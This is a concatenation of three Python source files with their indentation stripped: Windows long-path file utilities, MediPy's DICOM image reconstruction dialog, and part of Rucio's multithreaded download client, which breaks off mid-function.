platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
reconstruction.py
|
##########################################################################
# MediPy - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
import numpy
import wx
from medipy.gui import PeriodicProgressDialog, WorkerThread
from explorer_dialog import ExplorerDialog
from stacks_dialog import StacksDialog
import medipy.io.dicom
def images(datasets, parent, dtype=numpy.single,
size=(700,700), style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER) :
""" Return a list of medipy.base.Image objects from a list of DataSets.
"""
dialog = ExplorerDialog(parent, size=size,style=style)
dialog.set_datasets(datasets)
# Size must be specified explicitely on Windows
dialog.SetSize((700,700))
if dialog.ShowModal() != wx.ID_OK :
dialog.Destroy()
return []
dialog.Destroy()
# Get selected series from dialog, load it.
series = dialog.get_selected_datasets()
periodic_progress_dialog = PeriodicProgressDialog(
0.2, "Loading files", "Loading files ...")
worker_thread = WorkerThread(
periodic_progress_dialog,
target=medipy.io.dicom.load_dicomdir_records, args=(series,))
worker_thread.start()
periodic_progress_dialog.start()
worker_thread.join()
periodic_progress_dialog.Destroy()
if worker_thread.exception is not None :
wx.MessageBox(
"Could not load series : %s"%(worker_thread.exception,),
"Could not load series")
return []
series = worker_thread.result
# Reconstruct one image per stack
series = medipy.io.dicom.split.images(series)
series = medipy.io.dicom.normalize.normalize(series)
stacks = medipy.io.dicom.stacks(series)
result = []
periodic_progress_dialog = PeriodicProgressDialog(
0.2, "Reconstructing images",
"Reconstructing images (%i/%i) ..."%(0, len(stacks)))
for index, stack in enumerate(stacks) :
periodic_progress_dialog.Pulse(
"Reconstructing images (%i/%i) ..."%(index+1, len(stacks)))
worker_thread = WorkerThread(periodic_progress_dialog,
target=medipy.io.dicom.image, args=(stack,))
worker_thread.start()
periodic_progress_dialog.start()
worker_thread.join()
if worker_thread.exception is not None :
wx.MessageBox(
"Could not reconstruct image : %s"%(worker_thread.exception,),
"Could not reconstruct image")
else :
image = worker_thread.result
if dtype is not None :
image.data = image.data.astype(dtype)
result.append(image)
periodic_progress_dialog.Destroy()
return result
|
downloadclient.py
|
# -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import copy
import itertools
import logging
import os
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.config import config_get
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException)
from rucio.common.didtype import DID
from rucio.common.pcache import Pcache
from rucio.common.utils import adler32, detect_client_location, generate_uuid, parse_replicas_from_string, \
send_trace, sizefmt, execute, parse_replicas_from_file, extract_scope
from rucio.common.utils import GLOBALLY_SUPPORTED_CHECKSUMS, CHECKSUM_ALGO_DICT, PREFERRED_CHECKSUM
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger=logging.log):
"""
Initialises a extraction tool object
:param program_name: the name of the archive extraction program, e.g., unzip
:param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: optional decorated logging.log object that can be passed from the calling daemon or client.
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
self.is_useable_result = None
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
if self.is_useable_result is not None:
return self.is_useable_result
self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
return (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
"""
Initialises the basic settings for an DownloadClient object
:param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
:param external_traces: Optional: reference to a list where traces can be added
:param logger: Optional: logging.Logger object. If None, default logger will be used.
"""
self.check_pcache = check_pcache
if not logger:
self.logger = logging.log
else:
self.logger = logger.log
self.tracing = tracing
if not self.tracing:
logger(logging.DEBUG, 'Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
# if token should be used, use only JWT tokens
self.auth_token = self.client.auth_token if len(self.client.auth_token.split(".")) == 3 else None
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
logger(logging.DEBUG, 'Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
if self.client.vo != 'def':
self.trace_tpl['vo'] = self.client.vo
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger=self.logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger=self.logger))
self.extract_scope_convention = config_get('common', 'extract_scope', False, None)
def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
adler32 - Optional: The adler32 checmsum to compare the downloaded files adler32 checksum with
md5 - Optional: The md5 checksum to compare the downloaded files md5 checksum with
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
item['input_dids'] = {DID(did_str): {}}
if not did_str or not pfn or not rse:
logger(logging.DEBUG, item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger(logging.DEBUG, 'Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger(logging.DEBUG, did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'), did_scope, item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
did_path_name = did_name
if did_name.startswith('/'):
did_path_name = did_name[1:]
dest_file_path = os.path.join(dest_dir_path, did_path_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options['ignore_checksum'] = 'adler32' not in item and 'md5' not in item
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None,
deactivate_file_download_exceptions=False, sort=None):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
impl - Optional: name of the protocol implementation to be used to download this item.
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
transfer_speed_timeout - Optional: Minimum allowed transfer speed (in KBps). Ignored if transfer_timeout set. Otherwise, used to compute default timeout (Default: 500)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:param sort: Select best replica by replica sorting algorithm. Available algorithms:
``geoip`` - based on src/dst IP topographical distance
``closeness`` - based on src/dst closeness
``dynamic`` - Rucio Dynamic Smart Sort (tm)
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items), sort=sort)
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger(logging.INFO, 'Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
for metalink in metalinks:
did = DID(metalink['did'])
did_to_options[did] = [item]
metalink['input_dids'] = {did: {}}
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger(logging.INFO, 'Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '')
return list(output_queue.queue)
logger(logging.INFO, 'Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(0, num_threads):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'traces_copy_out': traces_copy_out,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger(logging.WARNING, 'Failed to start thread %d' % thread_num)
logger(logging.DEBUG, error)
try:
logger(logging.DEBUG, 'Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger(logging.DEBUG, '%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, traces_copy_out, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
os.kill(os.getpgid(), signal.SIGINT)
break
except Exception as error:
logger(logging.ERROR, '%sFailed to download item' % log_prefix)
logger(logging.DEBUG, error)
@staticmethod
def _compute_actual_transfer_timeout(item):
"""
Merge the two options related to timeout into the value which will be used for protocol download.
:param item: dictionary that describes the item to download
:return: timeout in seconds
"""
default_transfer_timeout = 360
default_transfer_speed_timeout = 500 # KBps
# Static additive increment of the speed timeout. To include the static cost of
# establishing connections and download of small files
transfer_speed_timeout_static_increment = 60
transfer_timeout = item.get('merged_options', {}).get('transfer_timeout')
if transfer_timeout is not None:
return transfer_timeout
transfer_speed_timeout = item.get('merged_options', {}).get('transfer_speed_timeout')
bytes_ = item.get('bytes')
if not bytes_ or transfer_speed_timeout is None:
return default_transfer_timeout
if not transfer_speed_timeout > 0:
transfer_speed_timeout = default_transfer_speed_timeout
# Convert from KBytes/s to bytes/s
transfer_speed_timeout = transfer_speed_timeout * 1000
timeout = bytes_ // transfer_speed_timeout + transfer_speed_timeout_static_increment
return timeout
def _download_item(self, item, trace, traces_copy_out, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger(logging.INFO, '%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
trace.setdefault('clientState', 'PROCESSING')
trace.setdefault('stateReason', 'UNKNOWN')
dest_file_paths = item['dest_file_paths']
# appending trace to list reference, if the reference exists
if traces_copy_out is not None:
traces_copy_out.append(trace)
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
if item.get('merged_options', {}).get('check_local_with_filesize_only', False):
local_filesize = os.stat(dest_file_path).st_size
if item.get('bytes') != local_filesize:
logger(logging.INFO, '%sFile with same name exists locally, but filesize mismatches: %s' % (log_prefix, did_str))
logger(logging.DEBUG, '%slocal filesize: %d bytes, expected filesize: %d bytes' % (log_prefix, local_filesize, item.get('bytes')))
continue
elif not item.get('merged_options', {}).get('ignore_checksum', False):
verified, _, _ = _verify_checksum(item, dest_file_path)
if not verified:
logger(logging.INFO, '%sFile with same name exists locally, but checksum mismatches: %s' % (log_prefix, did_str))
continue
logger(logging.INFO, '%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger(logging.DEBUG, "copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
send_trace(trace, self.client.host, self.client.user_agent)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger(logging.WARNING, '%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
trace['stateReason'] = 'No available sources'
self._send_trace(trace)
return item
# checking Pcache
storage_prefix = None
if pcache:
# to check only first replica is enough
pfn = sources[0]['pfn']
rse_name = sources[0]['rse']
# protocols are needed to extract deterministic part of the pfn
scheme = None
prots = self.client.get_protocols(rse_name)
for prot in prots:
if prot['scheme'] in pfn and prot['prefix'] in pfn:
scheme = prot['scheme']
storage_prefix = prot['prefix']
# proceed with the actual check
logger(logging.INFO, 'Checking whether %s is in pcache' % dest_file_path)
pcache_state = None
hardlink_state = None
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Pcache failure: %s' % str(e))
# if file found in pcache, send trace and return
if pcache_state == 0 and hardlink_state == 1:
logger(logging.INFO, 'File found in pcache.')
item['clientState'] = 'FOUND_IN_PCACHE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'FOUND_IN_PCACHE'
self._send_trace(trace)
return item
else:
logger(logging.INFO, 'File not found in pcache.')
# try different PFNs until one succeeded
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name, vo=self.client.vo)
except RucioException as error:
logger(logging.WARNING, '%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error))
trace['stateReason'] = str(error)
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
transfer_timeout = self._compute_actual_transfer_timeout(item)
timeout_log_string = ""
if transfer_timeout:
timeout_log_string = " and timeout of %ds" % transfer_timeout
logger(logging.INFO, '%sTrying to download with %s%s from %s: %s ' % (log_prefix, scheme, timeout_log_string, rse_name, did_str))
impl = item.get('impl')
if impl:
logger(logging.INFO, '%sUsing Implementation (impl): %s ' % (log_prefix, impl))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme, impl=impl, auth_token=self.auth_token, logger=logger)
protocol.connect()
except Exception as error:
logger(logging.WARNING, '%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger(logging.DEBUG, 'scheme: %s, exception: %s' % (scheme, error))
trace['stateReason'] = str(error)
continue
logger(logging.INFO, '%sUsing PFN: %s' % (log_prefix, pfn))
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger(logging.DEBUG, '%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=transfer_timeout)
success = True
except Exception as error:
logger(logging.DEBUG, error)
trace['clientState'] = str(type(error).__name__)
trace['stateReason'] = str(error)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
verified, rucio_checksum, local_checksum = _verify_checksum(item, temp_file_path)
if not verified:
success = False
os.unlink(temp_file_path)
logger(logging.WARNING, '%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)
if not success:
logger(logging.WARNING, '%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger(logging.ERROR, '%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger(logging.DEBUG, "renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
# if the file was downloaded with success, it can be linked to pcache
if pcache:
logger(logging.INFO, 'File %s is going to be registerred into pcache.' % dest_file_path)
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path)
logger(logging.INFO, 'File %s is now registerred into pcache.' % first_dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Failed to load file to pcache: %s' % str(e))
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
trace['stateReason'] = 'OK'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
